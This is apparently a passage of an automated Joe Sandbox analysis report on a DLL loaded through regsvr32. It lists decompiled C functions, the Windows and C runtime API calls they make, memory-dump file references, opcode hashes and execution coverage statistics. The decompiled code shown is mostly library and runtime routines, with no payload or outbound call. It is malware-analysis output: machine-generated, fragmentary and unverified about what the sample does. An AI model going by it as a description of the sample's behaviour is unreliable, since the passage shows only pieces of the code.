                                                                                                        0x7ffc2891157e
                                                                                                        0x7ffc28911582
                                                                                                        0x7ffc28911589
                                                                                                        0x7ffc2891158d
                                                                                                        0x7ffc28911597
                                                                                                        0x7ffc289115ab

                                                                                                        APIs
                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFC2891123C), ref: 00007FFC289113BF
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFC2891123C), ref: 00007FFC28911449
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 953036326-0
                                                                                                        • Opcode ID: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
                                                                                                        • Instruction ID: 62e5c960dc099423a216b0f06247754d27a116cfc4d52241169096ab12f5f29f
                                                                                                        • Opcode Fuzzy Hash: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
                                                                                                        • Instruction Fuzzy Hash: 6391D662E1C67A95FB50EB699C802BD27A0FB04B99F442137DE0E57AD4DF38D441CB28
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 47%
                                                                                                        			E00007FFC7FFC28901CE0(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				intOrPtr* _t48;
                                                                                                        				intOrPtr* _t50;
                                                                                                        				intOrPtr* _t52;
                                                                                                        				intOrPtr _t62;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if ((E00007FFC7FFC28902250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x28901d3a;
                                                                                                        				E00007FFC7FFC289018F0(__rax, _a8);
                                                                                                        				_t48 = _a16 - __rax;
                                                                                                        				E00007FFC7FFC28901DF0(_t48, _a8, _a8, _t48, _a24);
                                                                                                        				goto 0x28901de7;
                                                                                                        				E00007FFC7FFC28902170(_t48, _a8);
                                                                                                        				_t62 =  *0x2897a228; // 0xffffffffffffffff
                                                                                                        				_t50 = _t62 -  *_t48;
                                                                                                        				if (_t50 - _a24 > 0) goto 0x28901d65;
                                                                                                        				E00007FFC7FFC28902230(_a8);
                                                                                                        				E00007FFC7FFC28902170(_t50, _a8);
                                                                                                        				_t52 =  *_t50 + _a24;
                                                                                                        				_v24 = _t52;
                                                                                                        				if (_a24 <= 0) goto 0x28901de2;
                                                                                                        				r8d = 0;
                                                                                                        				if ((E00007FFC7FFC289022B0(_t52, _a8, _v24) & 0x000000ff) == 0) goto 0x28901de2;
                                                                                                        				E00007FFC7FFC289018F0(_t52, _a8);
                                                                                                        				_v16 = _t52;
                                                                                                        				E00007FFC7FFC28902170(_t52, _a8);
                                                                                                        				E00007FFC7FFC289011E0(_v16 +  *_t52, _a16, _a24);
                                                                                                        				return E00007FFC7FFC289023A0(_v16 +  *_t52, _a8, _v24);
                                                                                                        			}









                                                                                                        0x7ffc28901ce0
                                                                                                        0x7ffc28901ce5
                                                                                                        0x7ffc28901cea
                                                                                                        0x7ffc28901d07
                                                                                                        0x7ffc28901d0e
                                                                                                        0x7ffc28901d1b
                                                                                                        0x7ffc28901d30
                                                                                                        0x7ffc28901d35
                                                                                                        0x7ffc28901d3f
                                                                                                        0x7ffc28901d47
                                                                                                        0x7ffc28901d51
                                                                                                        0x7ffc28901d59
                                                                                                        0x7ffc28901d60
                                                                                                        0x7ffc28901d6a
                                                                                                        0x7ffc28901d72
                                                                                                        0x7ffc28901d77
                                                                                                        0x7ffc28901d82
                                                                                                        0x7ffc28901d84
                                                                                                        0x7ffc28901d9b
                                                                                                        0x7ffc28901da2
                                                                                                        0x7ffc28901da7
                                                                                                        0x7ffc28901db1
                                                                                                        0x7ffc28901dce
                                                                                                        0x7ffc28901deb

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC28902250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC2890226B
                                                                                                          • Part of subcall function 00007FFC28902250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC2890227C
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28901D0E
                                                                                                          • Part of subcall function 00007FFC289018F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC289018FE
                                                                                                          • Part of subcall function 00007FFC28901DF0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC28901E56
                                                                                                          • Part of subcall function 00007FFC28901DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28901E98
                                                                                                          • Part of subcall function 00007FFC28901DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28901EAC
                                                                                                          • Part of subcall function 00007FFC28901DF0: char_traits.LIBCPMTD ref: 00007FFC28901EDB
                                                                                                        • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC28901D60
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28901DA2
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC28901DCE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$Mtx_guardMtx_guard::~_char_traits$EmptyQueue::Structured
                                                                                                        • String ID:
                                                                                                        • API String ID: 3922470843-0
                                                                                                        • Opcode ID: 9dc5e077f87c3be6b44e717f9175d65acc51dec95d13604ab53f14413601f7af
                                                                                                        • Instruction ID: cf35d693f048c0a8354b8a5596612a608d539443793cd0511670a649644b0732
                                                                                                        • Opcode Fuzzy Hash: 9dc5e077f87c3be6b44e717f9175d65acc51dec95d13604ab53f14413601f7af
                                                                                                        • Instruction Fuzzy Hash: 9A21B022618A9981DA50EB96EC5127EA370FBC5BC1F500037FB8D47BAACE6ED540CB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 50%
                                                                                                        			E00007FFC7FFC28901DF0(intOrPtr* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				void* _t44;
                                                                                                        				intOrPtr* _t49;
                                                                                                        				intOrPtr* _t51;
                                                                                                        				long long _t53;
                                                                                                        				intOrPtr* _t54;
                                                                                                        				intOrPtr _t61;
                                                                                                        
                                                                                                        				_t49 = __rax;
                                                                                                        				_a32 = __r9;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				E00007FFC7FFC289021F0(_t44, __rax, _a16, _a24);
                                                                                                        				E00007FFC7FFC28902400(_t44, __rax, _a16, _a24, _a32);
                                                                                                        				_a32 = _t49;
                                                                                                        				E00007FFC7FFC28902170(_t49, _a8);
                                                                                                        				_t61 =  *0x2897a228; // 0xffffffffffffffff
                                                                                                        				_t51 = _t61 -  *_t49;
                                                                                                        				if (_t51 - _a32 > 0) goto 0x28901e5b;
                                                                                                        				E00007FFC7FFC28902230(_a8);
                                                                                                        				E00007FFC7FFC28902170(_t51, _a8);
                                                                                                        				_t53 =  *_t51 + _a32;
                                                                                                        				_v40 = _t53;
                                                                                                        				if (_a32 <= 0) goto 0x28901eef;
                                                                                                        				r8d = 0;
                                                                                                        				if ((E00007FFC7FFC289022B0(_t53, _a8, _v40) & 0x000000ff) == 0) goto 0x28901eef;
                                                                                                        				E00007FFC7FFC289018D0(_t53, _a16);
                                                                                                        				_t54 = _t53 + _a24;
                                                                                                        				_v24 = _t54;
                                                                                                        				E00007FFC7FFC289018F0(_t54, _a8);
                                                                                                        				_v32 = _t54;
                                                                                                        				E00007FFC7FFC28902170(_t54, _a8);
                                                                                                        				E00007FFC7FFC289011E0(_v32 +  *_t54, _v24, _a32);
                                                                                                        				return E00007FFC7FFC289023A0(_v32 +  *_t54, _a8, _v40);
                                                                                                        			}












                                                                                                        0x7ffc28901df0
                                                                                                        0x7ffc28901df0
                                                                                                        0x7ffc28901df5
                                                                                                        0x7ffc28901dfa
                                                                                                        0x7ffc28901dff
                                                                                                        0x7ffc28901e12
                                                                                                        0x7ffc28901e26
                                                                                                        0x7ffc28901e2b
                                                                                                        0x7ffc28901e35
                                                                                                        0x7ffc28901e3d
                                                                                                        0x7ffc28901e47
                                                                                                        0x7ffc28901e4f
                                                                                                        0x7ffc28901e56
                                                                                                        0x7ffc28901e60
                                                                                                        0x7ffc28901e68
                                                                                                        0x7ffc28901e6d
                                                                                                        0x7ffc28901e78
                                                                                                        0x7ffc28901e7a
                                                                                                        0x7ffc28901e91
                                                                                                        0x7ffc28901e98
                                                                                                        0x7ffc28901e9d
                                                                                                        0x7ffc28901ea2
                                                                                                        0x7ffc28901eac
                                                                                                        0x7ffc28901eb1
                                                                                                        0x7ffc28901ebb
                                                                                                        0x7ffc28901edb
                                                                                                        0x7ffc28901ef8

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC289021F0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC28902217
                                                                                                          • Part of subcall function 00007FFC28902170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC2890217E
                                                                                                        • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC28901E56
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28901E98
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28901EAC
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC28901EDB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityMtx_guardMtx_guard::~_Queue$EmptyQueue::Structuredchar_traits
                                                                                                        • String ID:
                                                                                                        • API String ID: 3679362534-0
                                                                                                        • Opcode ID: be7b329d797fb93d546e8614ca837f2ae52d3ad5271fd09d0c871be752f4c66c
                                                                                                        • Instruction ID: 9802d9fba11ec55252df7317a82468f8a1a36f4d1a398af0de3fa21fd6a7612f
                                                                                                        • Opcode Fuzzy Hash: be7b329d797fb93d546e8614ca837f2ae52d3ad5271fd09d0c871be752f4c66c
                                                                                                        • Instruction Fuzzy Hash: 3F21FE32618B5981DA50EB96FC9122FA360FBC8BD1F000036FA8D47BAACE7DD550CB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 56%
                                                                                                        			E00007FFC7FFC28911004(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
                                                                                                        				intOrPtr _v0;
                                                                                                        				signed long long _v8;
                                                                                                        				void* __rdi;
                                                                                                        				void* __rsi;
                                                                                                        				signed int _t41;
                                                                                                        				signed long long _t62;
                                                                                                        				short* _t67;
                                                                                                        				signed int* _t68;
                                                                                                        				intOrPtr* _t74;
                                                                                                        				intOrPtr* _t76;
                                                                                                        				void* _t84;
                                                                                                        				void* _t88;
                                                                                                        				signed short* _t89;
                                                                                                        				void* _t91;
                                                                                                        				void* _t94;
                                                                                                        				signed short* _t97;
                                                                                                        				void* _t99;
                                                                                                        				void* _t101;
                                                                                                        				void* _t103;
                                                                                                        				void* _t106;
                                                                                                        				void* _t107;
                                                                                                        
                                                                                                        				_t97 = __r8;
                                                                                                        				_t76 = __rcx;
                                                                                                        				_a8 = __rbx;
                                                                                                        				_a24 = __rbp;
                                                                                                        				E00007FFC7FFC28912DE0(__edx, __rax, __rbx, __rcx, _t84, _t88, _t91, __r8, _t99, _t101, _t103);
                                                                                                        				_t62 =  *0x2897e008; // 0xf9c171536c9e
                                                                                                        				_a5176 = _t62 ^ _t94 - __rax;
                                                                                                        				_t74 = _t76;
                                                                                                        				r14d = r9d;
                                                                                                        				r10d = r10d & 0x0000003f;
                                                                                                        				_t107 = _t106 + _t97;
                                                                                                        				_t89 = _t97;
                                                                                                        				 *_t74 =  *((intOrPtr*)(0x2897f940 + (__edx >> 6) * 8));
                                                                                                        				 *((intOrPtr*)(_t74 + 8)) = 0;
                                                                                                        				if (_t97 - _t107 >= 0) goto 0x28911145;
                                                                                                        				_t67 =  &_a40;
                                                                                                        				if (_t89 - _t107 >= 0) goto 0x289110ae;
                                                                                                        				_t41 =  *_t89 & 0x0000ffff;
                                                                                                        				if (_t41 != 0xa) goto 0x2891109a;
                                                                                                        				 *_t67 = 0xd;
                                                                                                        				_t68 = _t67 + 2;
                                                                                                        				 *_t68 = _t41;
                                                                                                        				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x2891107c;
                                                                                                        				_a16 = _a16 & 0x00000000;
                                                                                                        				_a8 = _a8 & 0x00000000;
                                                                                                        				_v0 = 0xd55;
                                                                                                        				_v8 =  &_a1752;
                                                                                                        				r9d = 0;
                                                                                                        				E00007FFC7FFC2890D698();
                                                                                                        				if (0 == 0) goto 0x2891113d;
                                                                                                        				if (0 == 0) goto 0x2891112d;
                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                        				r8d = 0;
                                                                                                        				r8d = r8d;
                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x2891113d;
                                                                                                        				if (0 + _a24 < 0) goto 0x289110fa;
                                                                                                        				 *((intOrPtr*)(_t74 + 4)) = __edi - r15d;
                                                                                                        				goto 0x28911071;
                                                                                                        				 *_t74 = GetLastError();
                                                                                                        				return E00007FFC7FFC28903A70(_t39, 0, 0, _a5176 ^ _t94 - __rax);
                                                                                                        			}
























                                                                                                        0x7ffc28911004
                                                                                                        0x7ffc28911004
                                                                                                        0x7ffc28911004
                                                                                                        0x7ffc28911009
                                                                                                        0x7ffc2891101b
                                                                                                        0x7ffc28911023
                                                                                                        0x7ffc2891102d
                                                                                                        0x7ffc28911038
                                                                                                        0x7ffc2891103e
                                                                                                        0x7ffc2891104c
                                                                                                        0x7ffc28911050
                                                                                                        0x7ffc28911056
                                                                                                        0x7ffc28911068
                                                                                                        0x7ffc2891106e
                                                                                                        0x7ffc28911071
                                                                                                        0x7ffc28911077
                                                                                                        0x7ffc2891107f
                                                                                                        0x7ffc28911081
                                                                                                        0x7ffc2891108c
                                                                                                        0x7ffc28911093
                                                                                                        0x7ffc28911096
                                                                                                        0x7ffc2891109a
                                                                                                        0x7ffc289110ac
                                                                                                        0x7ffc289110ae
                                                                                                        0x7ffc289110b9
                                                                                                        0x7ffc289110c7
                                                                                                        0x7ffc289110da
                                                                                                        0x7ffc289110df
                                                                                                        0x7ffc289110e9
                                                                                                        0x7ffc289110f2
                                                                                                        0x7ffc289110f8
                                                                                                        0x7ffc289110fa
                                                                                                        0x7ffc2891110f
                                                                                                        0x7ffc28911118
                                                                                                        0x7ffc28911123
                                                                                                        0x7ffc2891112b
                                                                                                        0x7ffc28911132
                                                                                                        0x7ffc28911138
                                                                                                        0x7ffc28911143
                                                                                                        0x7ffc28911173

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                        • String ID: U
                                                                                                        • API String ID: 442123175-4171548499
                                                                                                        • Opcode ID: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
                                                                                                        • Instruction ID: 7fcdf1ce994ecf9cb7b025163590bb9f00ca1bd16f9e5f33f97bc3d43bb5e617
                                                                                                        • Opcode Fuzzy Hash: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
                                                                                                        • Instruction Fuzzy Hash: 9341C762B1CA9591DB10DF29EC443A9B7A0F788B95F844032EE4E87798DF3CD441CB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00007FFC7FFC28912EB4(intOrPtr* __rcx) {
                                                                                                        				void* __rbx;
                                                                                                        				void* _t3;
                                                                                                        				void* _t7;
                                                                                                        				void* _t10;
                                                                                                        				void* _t11;
                                                                                                        				void* _t12;
                                                                                                        				void* _t13;
                                                                                                        
                                                                                                        				_t3 = E00007FFC7FFC28906B4C(_t7, __rcx, __rcx, _t10, _t11, _t12, _t13);
                                                                                                        				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x28912ed5;
                                                                                                        				if ( *__rcx != 0xe06d7363) goto 0x28912ed5;
                                                                                                        				if (_t3 == 1) goto 0x28912edb;
                                                                                                        				return _t3;
                                                                                                        			}










                                                                                                        0x7ffc28912ebd
                                                                                                        0x7ffc28912ec6
                                                                                                        0x7ffc28912ece
                                                                                                        0x7ffc28912ed3
                                                                                                        0x7ffc28912eda

                                                                                                        APIs
                                                                                                        • __C_specific_handler.LIBVCRUNTIME ref: 00007FFC28912EBD
                                                                                                          • Part of subcall function 00007FFC28906B4C: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFC28906C0C
                                                                                                          • Part of subcall function 00007FFC28906B4C: RtlUnwindEx.KERNEL32 ref: 00007FFC28906C5B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: C_specific_handlerCurrentImageNonwritableUnwind
                                                                                                        • String ID: csm$f
                                                                                                        • API String ID: 1396615161-629598281
                                                                                                        • Opcode ID: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
                                                                                                        • Instruction ID: d1e023d64a95aa4ad2fa2a3b871c3754704b9a91054573e5dddd5b5498581184
                                                                                                        • Opcode Fuzzy Hash: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
                                                                                                        • Instruction Fuzzy Hash: A8D05E51D0C36E45FB3A75B51C452781690CF1C726F088432C92C442C76F1E98E0CA29
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                        • String ID: P
                                                                                                        • API String ID: 1693014935-3110715001
                                                                                                        • Opcode ID: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
                                                                                                        • Instruction ID: 5a0070af3d2ea1f4d5bd1102f695a7b50df8b3b7f5d4498cef1e5a466211db3c
                                                                                                        • Opcode Fuzzy Hash: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
                                                                                                        • Instruction Fuzzy Hash: 1301C432519B8586E7609F00F89835BB7B4F788749F600129E6CD42BA8DFBDD158CF44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00007FFC7FFC2890472C(void* __eflags, void* __rax) {
                                                                                                        				char _v40;
                                                                                                        				void* _t6;
                                                                                                        				void* _t11;
                                                                                                        				void* _t12;
                                                                                                        				char* _t14;
                                                                                                        				void* _t16;
                                                                                                        
                                                                                                        				E00007FFC7FFC289045C0(__rax,  &_v40);
                                                                                                        				_t14 =  &_v40;
                                                                                                        				_t6 = E00007FFC7FFC28906E00(_t12, _t14, 0x2897cbd8, _t16);
                                                                                                        				asm("int3");
                                                                                                        				_t11 =  !=  ?  *((void*)(_t14 + 8)) : "Unknown exception";
                                                                                                        				return _t6;
                                                                                                        			}









                                                                                                        0x7ffc28904735
                                                                                                        0x7ffc28904741
                                                                                                        0x7ffc28904746
                                                                                                        0x7ffc2890474b
                                                                                                        0x7ffc28904758
                                                                                                        0x7ffc2890475d

                                                                                                        APIs
                                                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFC28904735
                                                                                                        • _CxxThrowException.LIBVCRUNTIME ref: 00007FFC28904746
                                                                                                          • Part of subcall function 00007FFC28906E00: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFC2890472B), ref: 00007FFC28906E7D
                                                                                                          • Part of subcall function 00007FFC28906E00: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFC2890472B), ref: 00007FFC28906EBC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                        • String ID: Unknown exception
                                                                                                        • API String ID: 3561508498-410509341
                                                                                                        • Opcode ID: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
                                                                                                        • Instruction ID: cbe5c85a7fa2b5f3eb5d8e1316020417eadb8500b127de4668a9cafd6cde86fb
                                                                                                        • Opcode Fuzzy Hash: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
                                                                                                        • Instruction Fuzzy Hash: 61D05E22A18A9AD5FE10FB00EC843A86330FB8030EF904433E24C415F1DF2DD64AC364
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:12.3%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:46
                                                                                                        Total number of Limit Nodes:2
